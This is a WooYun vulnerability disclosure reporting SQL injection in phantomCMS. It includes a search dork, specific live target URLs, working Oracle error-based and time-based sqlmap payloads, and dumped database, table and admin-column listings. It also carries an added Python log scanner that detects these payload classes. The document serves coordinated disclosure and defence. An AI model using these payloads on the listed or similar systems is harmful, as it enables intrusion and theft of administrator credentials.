
Vulnerability summary

Defect ID: wooyun-2014-057079

Title: Multiple SQL injections in a widely deployed value-added telecom services system

Related vendor: CNCERT (National Computer Network Emergency Response Technical Team/Coordination Center of China)

Author: xfkxfk

Submitted: 2014-04-16 18:06

Fixed: 2014-07-15 18:07

Published: 2014-07-15 18:07

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Handed over to a third-party partner organization (CNCERT) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-04-16: Details sent to the vendor, awaiting vendor handling
2014-04-21: Vendor confirmed; details disclosed to the vendor only
2014-04-24: Details opened to third-party security partners
2014-06-15: Details disclosed to core white hats and domain experts
2014-06-25: Details disclosed to regular white hats
2014-07-05: Details disclosed to intern white hats
2014-07-15: Details disclosed to the public

Brief description:

A widely deployed system used in value-added telecom services contains multiple SQL injection vulnerabilities.

Detailed description:

phantomCMS, a community-oriented CMS used in value-added telecom services, is a management system developed by Jiangsu Hongxin System Integration Co., Ltd. It is in use across several provinces and cities, contains multiple SQL injection points, and its database can be dumped.
Google keyword: inurl:phantomCMS
http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2
http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2
http://222.92.198.27/phantomCMS/toSqwz.action?sid=2
http://www.liuxiang.gov.cn/phantomCMS/toSqwz.action?sid=
First SQL injection:
Taking http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2 as an example:
The search function is injectable, as follows:
http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123%25%27

---
Place: GET
Parameter: searStr
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: sid=2&searStr=123') AND 2424=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(115)||CHR(105)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (2424=2424) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(106)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND ('udbt'='udbt
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (comment)
Payload: sid=2&searStr=123') AND 1642=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(80)||CHR(82)||CHR(85),5)--
---
[22:06:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


Second SQL injection:
Taking http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2 as an example:
The login function is injectable, as follows:
URL: http://www.jssqw.net/ynlUserLogin.action
POST: fromIndex=yes&loginBean.communityAccount=111&loginBean.cummunityUserAccount=111&loginBean.password=111&Submit=%E6%8F%90%E4%BA%A4

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: loginBean.communityAccount
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fromIndex=yes&loginBean.communityAccount=111' AND 8484=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(102)||CHR(121),5) AND 'eogz'='eogz&loginBean.cummunityUserAccount=111&loginBean.password=111&Submit=%E6%8F%90%E4%BA%A4
---
[22:08:23] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
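As an added detection example (not part of this report or of phantomCMS), the following Python scans constructed access-log lines shaped like the two payload classes above, error-based XMLType and time-based DBMS_PIPE.RECEIVE_MESSAGE, percent-decoding each query parameter before matching so that encoded probes are not missed. The host address, timestamps and combined-log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Oracle-specific markers drawn from the payload classes in this report:
# time-based blind via DBMS_PIPE.RECEIVE_MESSAGE, error-based via XMLType,
# the CHR()||CHR() string building used to avoid literal quotes, and a
# quote/paren break followed by a boolean tail.
ORACLE_SQLI_MARKERS = [
    (re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE", re.I), "oracle time-based blind (DBMS_PIPE)"),
    (re.compile(r"\bXMLType\s*\(", re.I), "oracle error-based (XMLType)"),
    (re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I), "CHR() concatenation"),
    (re.compile(r"'\)?\s*(AND|OR)\s+\d+\s*=", re.I), "quote break + boolean tail"),
]

# Minimal combined-log-format request line: method, target, status.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log (hypothetical client 10.0.0.5; not taken from the report):
# one benign search, then two requests shaped like the report's sqlmap payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Apr/2014:22:05:58 +0800] "GET /phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=police HTTP/1.1" 200 5120
10.0.0.5 - - [16/Apr/2014:22:06:10 +0800] "GET /phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123%27%29+AND+2424%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%29%29+FROM+DUAL%29+AND+%28%27udbt%27%3D%27udbt HTTP/1.1" 500 812
10.0.0.5 - - [16/Apr/2014:22:06:31 +0800] "GET /phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123%27%29+AND+1642%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%2880%29%2C5%29-- HTTP/1.1" 200 5120
"""

def classify_request(target: str) -> list:
    """Return 'param: marker' labels for every decoded query value that matches a marker."""
    hits = []
    # parse_qs percent-decodes and turns '+' into spaces, so matching runs on the
    # SQL text the application itself would have received.
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            hits += [f"{name}: {label}" for pat, label in ORACLE_SQLI_MARKERS if pat.search(value)]
    return hits

def scan_log(text: str) -> list:
    """Return (target, status, hits) for each line whose parameters look like an Oracle SQLi probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m and (hits := classify_request(m["target"])):
            findings.append((m["target"], int(m["status"]), hits))
    return findings

if __name__ == "__main__":
    for target, status, hits in scan_log(SAMPLE_LOG):
        print(status, target.split("?")[0], hits)
```

The login injection travels in a POST body, which standard access logs do not record; the same classify_request check applies to application-level request logs that capture form fields.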

Proof of vulnerability:

First SQL injection:
http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123
Database information retrieved:

available databases [29]:
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GL_CMS61
[*] GL_FORUM61
[*] GL_INTER61
[*] GL_OLDPRINT
[*] GL_SQ61
[*] HR
[*] IX
[*] LIXIANG
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SQ
[*] SQELIST
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


Contents of the CMS database:

Database: CMS
[42 tables]
+-----------------------------+
| CMS_ARTICLE |
| CMS_ARTICLE_CONTENT |
| CMS_ARTICLE_PICTURE |
| CMS_ARTICLE_RECORD |
| CMS_CHANNEL |
| CMS_CLICK_RATE_DETAIL |
| CMS_DICTIONARY |
| CMS_FLOAT_PICTURE |
| CMS_INFO_SHARE_CIRCLE |
| CMS_INFO_SHARE_CIRCLE_SITE |
| CMS_LOCALITY_POLICE |
| CMS_MONTH_STAR |
| CMS_ORGANIZATION_SITE |
| CMS_PICTURE |
| CMS_POLICE_REPORT |
| CMS_POLICE_SERVICE |
| CMS_REFERENCE |
| CMS_SITE |
| CMS_SITE_ADMIN |
| CMS_SITE_LINK |
| CMS_SITE_PICTURE |
| CMS_SITE_ROLE |
| CMS_STOPWORD |
| CMS_TEMPLATE |
| CMS_TEMPLATE_SCENARIO |
| CMS_TEMPLATE_TYPE |
| CMS_THEMATIC |
| CMS_THEMATIC_ARTICLE |
| CMS_THEMATIC_CHANNEL |
| P_ADMIN |
| P_ADMIN_ROLE |
| P_FUNCTION |
| P_LOAD_INFORMATION |
| P_MODULE |
| P_ORGANIZATION |
| P_ROLE |
| P_ROLE_FUNCTION |
| P_ROLE_MODULE |
| SYS_OPERATION_LOG |
| SYS_PARAMETER |
| SYS_SELECT_PARAMETER |
| SYS_SELECT_PARAMETER_DETAIL |
+-----------------------------+


Database: CMS
Table: P_ADMIN
[9 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| PA_ACCOUNT | VARCHAR2 |
| PA_ADDRESS | VARCHAR2 |
| PA_EMAIL | VARCHAR2 |
| PA_ID | NUMBER |
| PA_NAME | VARCHAR2 |
| PA_PASSWORD | VARCHAR2 |
| PA_PHONE | VARCHAR2 |
| PA_STATE | NUMBER |
| PA_TYPE | NUMBER |
+-------------+----------+

Fix recommendation:

Filter the injected parameters.

Copyright notice: when reposting, please credit the source: xfkxfk@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-04-21 10:24

Vendor reply:

CNVD has confirmed and reproduced the described issue on multiple instances. Based on the test results, the case has been forwarded by CNCERT to the Jiangsu branch center, which has been asked to coordinate handling with the software vendor.

Latest status:

None yet